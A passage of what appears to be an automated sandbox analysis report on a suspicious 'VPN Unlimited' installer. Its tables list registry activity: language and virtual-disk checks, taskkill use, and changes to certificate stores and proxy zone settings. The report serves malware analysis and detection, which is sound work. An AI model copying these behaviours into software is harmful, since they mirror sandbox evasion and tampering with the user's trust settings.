| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GGC0A.tmp\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{11C4A562-1DF9-45BB-84ED-B8E86757493D}\.cr\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4dab861c5f15add1529fa378ceef1272 | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Install(4).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000001d3755855d3e98e80000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800001d3755850000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809001d375585000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d1d375585000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000001d37558500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-20\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\dialer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\system32\dialer.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
